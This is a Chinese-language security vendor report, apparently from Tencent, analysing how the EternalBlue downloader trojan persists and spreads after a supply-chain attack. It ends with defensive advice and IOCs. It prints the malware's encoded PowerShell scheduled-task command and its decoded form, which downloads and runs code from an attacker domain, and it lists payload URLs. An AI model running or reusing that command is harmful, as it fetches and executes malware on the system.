本帖最后由 腾讯电脑管家 于 2019-2-22 16:51 编辑
一、背景腾讯安全御见威胁情报中心2019年2月10日发现永恒之蓝下载器木马再次更新,此前攻击者针对驱动人生公司的供应链进行攻击,利用其软件升级通道下发永恒之蓝下载器木马,在攻击模块中利用“永恒之蓝”漏洞攻击,造成短时间内大范围感染。事件发生之后,驱动人生公司对受到木马影响的升级通道进行了紧急关闭。 但该木马下载器的幕后控制者并没有就此放弃行动,而是借助其已经感染的机器进行持续攻击:包括通过云控指令下发挖矿模块,在中招机器安装多个服务以及通过添加计划任务获得持续执行的机会,后续版本在攻击模块新增SMB爆破、远程执行工具psexec攻击、利用Powershell版mimikatz获取密码,以增强其扩散传播能力。 2019年2月10日发现的更新版本中,我们发现攻击者再次对攻击模块进行升级,改变其木马生成方式为Pyinstaller,同时在打包的Python代码中新增了email、cookie、ftp、http相关功能文件。
二、持久化 图1 木马通过将程序安装至系统服务、计划任务从而可以开机启动同时每隔一段时间重复启动,获得在感染电脑持续驻留的机会。 服务安装当前版本木马共安装两个服务,服务Ddriver用来启动主程序,该程序负责启动攻击模块以及接受云控指令。服务WebServers用来启动后门程序wmiex.exe,该程序负责下载其他文件、上报信息、管理服务进程。 服务名:Ddriver,可执行文件路径c:\windows\SysWOW64\drivers\svchost.exe 图2 服务名:WebServers,可执行文件路径c:\windows\SysWOW64\wmiex.exe 图3 计划任务当前版本木马共安装四个计划任务,其中计划任务Ddrivers负责启动主模块,指向服务Ddriver相同文件;计划任务WebServers负责启动后门程序wmiex.exe,指向服务WebServers相同程序。计划任务DnsScan负责启动攻击模块,该模块利用永恒之蓝漏洞、SMB弱口令爆破、PSEXEC、MimiKatz等多种方式进行攻击。计划任务Bluetooths负责下载执行远程Powershell指令。 计划任务名:Ddrivers,启动路径:cmd.exe /c c:\windows\SysWOW64\drivers\svchost.exe 触发器:在首次触发后,无限期地每隔00:50:00重复一次。 图4 计划任务名:DnsScan,启动程序:c:\Windows\Temp\svchost.exe 触发器:在首次触发后,无限期地每隔1小时重复一次。 图5 计划任务名:WebServers,启动程序:cmd.exe /c c:\windows\SysWOW64\wmiex.exe 触发器:在首次触发后,无限期地每隔00:50:00重复一次。 图6 计划任务名:Bluetooths,启动程序: powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA= (解密字符:powershell -ep bypass –e IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)) 触发器:在首次触发后,无限期地每隔00:50:00重复一次。 图7
三、攻击模块攻击模块c:\Windows\Temp\svchost.exe,根据感染后安装的服务以及计划任务,会在每次开机时启动,同时在首次启动后每隔1小时执行一次。在首次下发之后,攻击者对该模块进行了多次更新,以继续扩大感染范围。 目前最新的版本具有以下几种攻击行为: 1、永恒之蓝漏洞攻击 图8 2、SMB弱口令爆破攻击 图9 3、远程执行工具psexec攻击 图10 4、Powershell版mimikatz获取登录密码 图11 图12
四、攻击模块最新变化腾讯御见威胁情报中心在2019年2月10日再次捕获到攻击模块的更新,此次更新具有以下变化: 1、木马生成方式改变 攻击模块(C:\Windows\Temp\svchost.exe)的打包方式由原来的py2exe生成替换为使用Pyinstaller生成。第一种情况下只需使用winrar解压即可获取python源文件,此次变化后需要通过Pyinstaller的解压模块pyinstxtractor.py在python环境下进行恢复,增加了分析成本。使用pyinstxtractor.py对该文件进行恢复后,释放出了了349个python编译文件。 图13 2、新增Python代码 2019年1月25日更新后的代码目录 图14 2019年2月10日更新后的代码目录 图15 将前后进行对比可以发现,最新的样本解压目录中新增了email包、json包以及_LWPCookieJar.pyc、_MozillaCookieJar.pyc、cookielib.pyc、ftplib.pyc、httplib.pyc、urlib.pyc等多个文件。新增的模块可用于解析邮件、搜集用户Cookie信息、登录FTP服务、发送HTTP请求等操作。
五、安全建议 2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解; 3.使用杀毒软件拦截可能的病毒攻击; 4.推荐企业用户部署腾讯御界高级威胁检测系统检测可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统 图16 IOCsMd5 59b18d6146a2aa066f661599c496090d 30429a24f312153c0ec271ca3feabf3d f9144118127ff29d4a49a30b242ceb55 fb89d40e24f5ff55228c38b2b07b2e77 1e0db9fdbc57525a2a5f5b4c69fac3bb 5ab6f8ca1f22d88b8ef9a4e39fca0c03 d4e2ebcf92cf1b2e759ff7ce1f5688ca 32653b2c277f18779c568a1e45cacc0f ab1c947c0c707c0e0486d25d0ae58148 bc26fd7a0b7fe005e116f5ff2227ea4d a4b7940b3d6b03269194f728610784d6 85013cc5d7a6db3bcee3f6b787baf957 667a3848b411af0b6c944d47b559150f domain i.haqo.net ii.haqo.net dl.haqo.net loop.haqo.net loop2.haqo.net loop.abbbny.com oo.beahh.com pp.abbny.com o.beahh.com p.abbny.com v.beahh.com IP 139.163.55.76 172.104.73.9 URL hxxp://dl.haqo.net/dll.exe hxxp://172.104.73.9/dll.exe hxxp://dl.haqo.net/updatedl.exe hxxp://i.haqo.net/i.png hxxp://ii.haqo.net/u.png hxxp://oo.beahh.com/u.png hxxp://pp.abbny.com/u.png hxxp://p.abbny.com/im.png hxxp://dl.haqo.net/i_1.exez hxxp://dl.haqo.net/xmrig-64_1.mlz hxxp://dl.haqo.net/xmrig-32_1.mlz hxxp://dl.haqo.net/ins4.exez hxxp://v.beahh.com/v
|